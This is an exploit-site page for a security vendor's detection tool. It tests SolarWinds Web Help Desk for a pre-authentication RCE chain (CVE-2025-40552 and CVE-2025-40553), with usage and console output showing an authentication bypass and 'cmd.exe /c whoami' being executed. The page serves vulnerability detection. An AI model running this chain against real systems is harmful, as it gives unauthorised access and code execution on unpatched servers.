## https://sploitus.com/exploit?id=8A6FA74F-A4B7-598D-932A-0A26436B9BC2
# CVE-2025-40552 and CVE-2025-40553 SolarWinds Web Help Desk Pre-Auth RCE Chain
SolarWinds Web Help Desk Pre-Auth RCE Chain Detection Artifact Generator Tool
# Description
This Detection Artifact Generator verifies if SolarWinds Web Help Desk instance is vulnerable to CVE-2025-40552 and CVE-2025-40553.
Detection Artifact Generator attempts to perform two operations:
* Bypass authentication with CVE-2025-40552 - this check is very accurate.
* If it is successful, it tries to verify the CVE-2025-40553 RCE through the execution of `cmd.exe /c whoami` command - this check is not 100% accurate, as it's based on the error messages that may vary depending on the environment.
**ATTENTION** - during the RCE testing, the script will create `SWWHDDAG` table in the `postgres` database.
After the test, you can verify if the command output exists in the database:
```
> SELECT * FROM public.swwhddagmm2t6t79
"output"
"nt authoritysystem"
```
# Detection in Action
Test against vulnerable instance:
```
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://vulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[+] VULNERABLE to CVE-2025-40552 Authentication Bypass
[+] Testing CVE-2025-40553 RCE
[+] This stage will create SWWHDDAGp08zwfs6 DB table if successful
[+] Verifying deserialization and serialization of org.apache.commons.dbcp2.BasicDataSource
[+] PROBABLY VULNERABLE: Connection validated and SQL queries can be executed
[+] Executing "cmd.exe /c whoami" - verify locally if it worked
```
Test against not vulnerable instance:
```
$ python3 watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py -H https://notvulnerable.lab:8443
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553.py
(*) CVE-2025-40552 + CVE-2025-40553 Pre-Auth RCE Chain in SolarWinds Web Help Desk - Detection Artifact Generator
- Piotr Bazydlo (@chudyPB) of watchTowr
CVEs: CVE-2025-40552 and CVE-2025-40553
[+] Testing CVE-2025-40552 Authentication Bypass
[+] Triggering error and poisoning context cache with LookAndFeelPref
[-] NOT VULNERABLE to CVE-2025-40552, exiting
```
# Affected Versions
`< SolarWinds Web Help Desk 2026.1`
References: https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber